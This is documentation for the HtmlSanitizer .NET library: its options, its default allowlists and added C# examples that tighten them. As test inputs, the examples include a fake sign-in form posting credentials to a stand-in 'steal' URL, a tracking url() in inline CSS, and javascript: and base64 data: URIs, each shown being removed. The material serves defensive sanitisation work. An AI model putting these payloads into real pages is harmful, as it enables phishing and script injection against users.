Options
HtmlSanitizer has a few flags that can be set to affect how the input string is parsed:

| Name | Description | Default |
|---|---|---|
| KeepChildNodes | If true, the child nodes of elements that are removed are kept (only the disallowed element itself is dropped; the children are still sanitized individually). | false |
| AllowDataAttributes | If true, all HTML5 data attributes (attributes prefixed with `data-`) are allowed. | false |
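The effect of the two flags on a constructed input, as an added example (this is not code from the HtmlSanitizer project). It assumes the `Ganss.Xss` namespace of HtmlSanitizer 7.0 and later (older packages use `Ganss.XSS`); the sample HTML is made up, and uses only element and attribute names that the default lists on this page cover.

```csharp
using System;
using Ganss.Xss; // HtmlSanitizer 7.0+; earlier packages use the Ganss.XSS namespace

// Added example, not part of the HtmlSanitizer project.
public static class OptionsDemo
{
    // Constructed sample: <blink> is not in the default element allowlist,
    // data-id is not in the default attribute allowlist.
    const string Input = "<div data-id=\"42\"><blink>flashing</blink> <b>bold</b></div>";

    public static string Sanitize(bool keepChildNodes, bool allowDataAttributes)
    {
        var sanitizer = new HtmlSanitizer
        {
            KeepChildNodes = keepChildNodes,           // default: false
            AllowDataAttributes = allowDataAttributes  // default: false
        };
        return sanitizer.Sanitize(Input);
    }

    public static void Main()
    {
        // Defaults: the <blink> element is removed together with its text,
        // and data-id is stripped from <div>.
        Console.WriteLine(Sanitize(keepChildNodes: false, allowDataAttributes: false));

        // KeepChildNodes: <blink> is still removed, but its child text "flashing"
        // is moved up into <div>. Useful for legacy formatting tags; the children
        // are still run through the same allowlist, so a nested disallowed element
        // does not survive just because its parent was unwrapped.
        Console.WriteLine(Sanitize(keepChildNodes: true, allowDataAttributes: false));

        // AllowDataAttributes: data-id is kept. Enable this only if the client-side
        // code that later reads data-* values treats them as plain data and never
        // inserts them into the DOM as HTML or uses them to build selectors.
        Console.WriteLine(Sanitize(keepChildNodes: false, allowDataAttributes: true));
    }
}
```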
HtmlSanitizer works by allowing only a set of specific elements, attributes, CSS properties and URI schemes (an allowlist), rather than looking for specific exploits (a denylist). Anything that is not on the lists below is removed, so the safe way to extend it is to add the individual element, attribute or scheme you actually need.
The following HTML elements are allowed by default:

a, abbr, acronym, address, area, article, aside, b, bdi, big, blockquote, br, button,
caption, center, cite, code, col, colgroup, data, datalist, dd, del, details, dfn, dir,
div, dl, dt, em, fieldset, figcaption, figure, font, footer, form, h1, h2, h3, h4, h5,
h6, header, hr, i, img, input, ins, kbd, keygen, label, legend, li, main, map, mark,
menu, menuitem, meter, nav, ol, optgroup, option, output, p, pre, progress, q, rp, rt,
ruby, s, samp, section, select, small, span, strike, strong, sub, summary, sup, table,
tbody, td, textarea, tfoot, th, thead, time, tr, tt, u, ul, var, wbr
The following attributes are allowed by default:

abbr, accept, accept-charset, accesskey, action, align, alt, autocomplete, autosave,
axis, bgcolor, border, cellpadding, cellspacing, challenge, char, charoff, charset,
checked, cite, clear, color, cols, colspan, compact, contenteditable, coords, datetime,
dir, disabled, draggable, dropzone, enctype, for, frame, headers, height, high, href,
hreflang, hspace, ismap, keytype, label, lang, list, longdesc, low, max, maxlength,
media, method, min, multiple, name, nohref, noshade, novalidate, nowrap, open, optimum,
pattern, placeholder, prompt, pubdate, radiogroup, readonly, rel, required, rev,
reversed, rows, rowspan, rules, scope, selected, shape, size, span, spellcheck, src,
start
Note: to prevent classjacking and interference with classes where the sanitized fragment is to be integrated, the `class` attribute is not in the allowlist by default. It can be added as follows:

```csharp
var sanitizer = new HtmlSanitizer();
sanitizer.AllowedAttributes.Add("class");
var sanitized = sanitizer.Sanitize(html);
```
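The default element and attribute lists above include form controls (`form`, `input`, `button`, `select`, `textarea`, `keygen`) and the `action` and `method` attributes. For user-generated content such as comments that is more than needed: a fragment that passes the default configuration can still render a credential-harvesting form posting to an attacker's server over `https`. The following added example (not code from the HtmlSanitizer project) narrows the allowlist for that use case, adds `class` back as the note above describes, and logs what is stripped. It assumes the `Ganss.Xss` namespace of HtmlSanitizer 7.0 and later and the `RemovingTag` / `RemovingAttribute` events of that version; the sample comment is constructed.

```csharp
using System;
using Ganss.Xss; // HtmlSanitizer 7.0+; earlier packages use the Ganss.XSS namespace

// Added example, not part of the HtmlSanitizer project.
public static class CommentSanitizer
{
    // Elements and attributes from the default lists that a comment never needs.
    static readonly string[] FormElements =
    {
        "form", "input", "button", "select", "option", "optgroup", "textarea",
        "keygen", "datalist", "label", "fieldset", "legend"
    };
    static readonly string[] FormAttributes =
    {
        "action", "method", "enctype", "accept-charset", "novalidate",
        "autocomplete", "challenge", "keytype"
    };

    public static HtmlSanitizer Create()
    {
        var sanitizer = new HtmlSanitizer();

        // AllowedTags and AllowedAttributes are ISet<string>: subtract in one call.
        sanitizer.AllowedTags.ExceptWith(FormElements);
        sanitizer.AllowedAttributes.ExceptWith(FormAttributes);

        // class is deliberately absent from the defaults (classjacking). Allow it here
        // only because the fragment is rendered inside a container whose stylesheet
        // is scoped, so a user-chosen class cannot pick up the host page's rules.
        sanitizer.AllowedAttributes.Add("class");

        // Make stripped input visible to monitoring; a steady stream of removed
        // <form> elements from one account is worth an alert.
        // (Event and argument names as in HtmlSanitizer 7+; verify for your version.)
        sanitizer.RemovingTag += (_, e) =>
            Console.WriteLine($"removed <{e.Tag.TagName.ToLowerInvariant()}>: {e.Reason}");
        sanitizer.RemovingAttribute += (_, e) =>
            Console.WriteLine($"removed {e.Attribute.Name} on <{e.Tag.TagName.ToLowerInvariant()}>: {e.Reason}");

        return sanitizer;
    }

    public static void Main()
    {
        var sanitizer = Create();

        // Constructed sample. Every element and attribute here is on the default
        // allowlist and the action URL uses an allowed scheme, so the unmodified
        // default configuration would keep the whole form.
        const string comment =
            "<p class=\"note\">Your session expired, please sign in again:</p>" +
            "<form action=\"https://example.invalid/steal\" method=\"post\">" +
            "<input name=\"user\"><input name=\"pass\"><button>Sign in</button></form>";

        // With the narrowed lists, <form>, <input> and <button> are removed
        // and only the paragraph (with its class) remains.
        Console.WriteLine(sanitizer.Sanitize(comment));
    }
}
```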
The following properties are allowed when using a `style` attribute:

background, background-attachment, background-color, background-image,
background-position, background-repeat, border, border-bottom, border-bottom-color,
border-bottom-style, border-bottom-width, border-collapse, border-color, border-left,
border-left-color, border-left-style, border-left-width, border-right,
border-right-color, border-right-style, border-right-width, border-spacing,
border-style, border-top, border-top-color, border-top-style, border-top-width,
border-width, bottom, caption-side, clear, clip, color, content, counter-increment,
counter-reset, cursor, direction, display, empty-cells, float, font, font-family,
font-size, font-style, font-variant, font-weight, height, left, letter-spacing,
line-height, list-style, list-style-image, list-style-position, list-style-type,
margin, margin-bottom, margin-left, margin-right, margin-top, max-height, max-width,
min-height, min-width, opacity, orphans, outline, outline-color, outline-style,
outline-width, overflow, padding, padding-bottom, padding-left, padding-right,
padding-top, page-break-after, page-break-before, page-break-inside, quotes, right,
table-layout, text-align, text-decoration, text-indent, text-transform, top,
unicode-bidi, vertical-align, visibility, white-space, widows, width, word-spacing,
z-index
The following at-rules are allowed by default: `namespace`, `style`. Here `style` refers to style declarations nested within other at-rules such as `@media`. Disallowing `@namespace` while allowing other types of at-rules can lead to errors. Property declarations in `@font-face` and `@viewport` are not sanitized.

Note: the `style` tag is disallowed by default; only the `style` attribute is subject to the property list above.
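Several properties on the default CSS list accept `url()` values (`background`, `background-image`, `list-style`, `list-style-image`, `cursor`, `content`). In a user-controlled fragment an allowed inline style can therefore make every viewer's browser fetch an attacker-chosen resource, which is at minimum a tracking beacon. The following added example (not code from the HtmlSanitizer project) removes those properties from the allowlist and logs removals. It assumes the `Ganss.Xss` namespace of HtmlSanitizer 7.0 and later and the `RemovingStyle` event of that version; the sample style attribute is constructed.

```csharp
using System;
using Ganss.Xss; // HtmlSanitizer 7.0+; earlier packages use the Ganss.XSS namespace

// Added example, not part of the HtmlSanitizer project.
public static class StyleTightening
{
    // Default-allowed properties whose value may contain url(...).
    static readonly string[] UrlBearingProperties =
    {
        "background", "background-image", "list-style", "list-style-image",
        "cursor", "content"
    };

    public static HtmlSanitizer Create()
    {
        var sanitizer = new HtmlSanitizer();

        // AllowedCssProperties is ISet<string>, like the tag and attribute sets.
        sanitizer.AllowedCssProperties.ExceptWith(UrlBearingProperties);

        // The style attribute stays allowed. The <style> element is disallowed by
        // default and is deliberately not added here, so only inline declarations
        // ever reach the property filter.

        // (Event and argument names as in HtmlSanitizer 7+; verify for your version.)
        sanitizer.RemovingStyle += (_, e) =>
            Console.WriteLine($"removed style '{e.Style.Name}' on <{e.Tag.TagName.ToLowerInvariant()}>: {e.Reason}");

        return sanitizer;
    }

    public static void Main()
    {
        var sanitizer = Create();

        // Constructed sample: two harmless declarations around one that would
        // trigger a request to a third-party host when the fragment is displayed.
        const string html =
            "<p style=\"color:red; background-image:url(https://tracker.invalid/p.gif); " +
            "font-weight:bold\">hello</p>";

        // color and font-weight are kept; background-image is removed by the
        // narrowed property list.
        Console.WriteLine(sanitizer.Sanitize(html));
    }
}
```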
The following URI schemes are allowed by default: `http`, `https`.

Note: Protocol-relative URLs (e.g. //github.com) are allowed by default (as are other relative URLs).

To allow `mailto:` links:

```csharp
sanitizer.AllowedSchemes.Add("mailto");
```

The following attributes are treated as URI attributes and have their values checked against the allowed schemes: `action`, `background`, `dynsrc`, `href`, `lowsrc`, `src`.
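The scheme check applied to the URI attributes above, as an added example (not code from the HtmlSanitizer project): `mailto` is added to the default `http`/`https`, links with other schemes lose their URI attribute, and the optional `baseUrl` argument of `Sanitize()` resolves relative and protocol-relative URLs to absolute ones so that the output contains explicit hosts. It assumes the `Ganss.Xss` namespace of HtmlSanitizer 7.0 and later; all sample links are constructed.

```csharp
using System;
using Ganss.Xss; // HtmlSanitizer 7.0+; earlier packages use the Ganss.XSS namespace

// Added example, not part of the HtmlSanitizer project.
public static class LinkSanitizing
{
    public static HtmlSanitizer Create()
    {
        var sanitizer = new HtmlSanitizer();
        // http and https are already in the set; add mailto as documented above.
        sanitizer.AllowedSchemes.Add("mailto");
        return sanitizer;
    }

    // baseUrl is the second parameter of Sanitize(); relative URLs in the URI
    // attributes (href, src, action, ...) are resolved against it.
    public static string SanitizeLinks(string html, string baseUrl) =>
        Create().Sanitize(html, baseUrl);

    public static void Main()
    {
        // Constructed samples, one per case.
        string[] samples =
        {
            "<a href=\"https://example.invalid/doc\">https: allowed, kept</a>",
            "<a href=\"mailto:security@example.invalid\">mailto: kept after AllowedSchemes.Add</a>",
            "<a href=\"javascript:alert(1)\">javascript: not an allowed scheme, href removed, text kept</a>",
            "<a href=\"data:text/html;base64,PHNjcmlwdD4=\">data: not an allowed scheme, href removed</a>",
            "<img src=\"//cdn.other.invalid/x.png\" alt=\"protocol-relative: allowed, made absolute by baseUrl\">",
            "<a href=\"/relative/path\">relative: allowed, made absolute by baseUrl</a>",
        };

        foreach (var sample in samples)
            Console.WriteLine(SanitizeLinks(sample, "https://example.invalid/"));

        // Note that resolving a protocol-relative URL still yields a link to the
        // other host; if only certain hosts may be referenced, that is a separate
        // check on the resolved output, not something the scheme allowlist provides.
    }
}
```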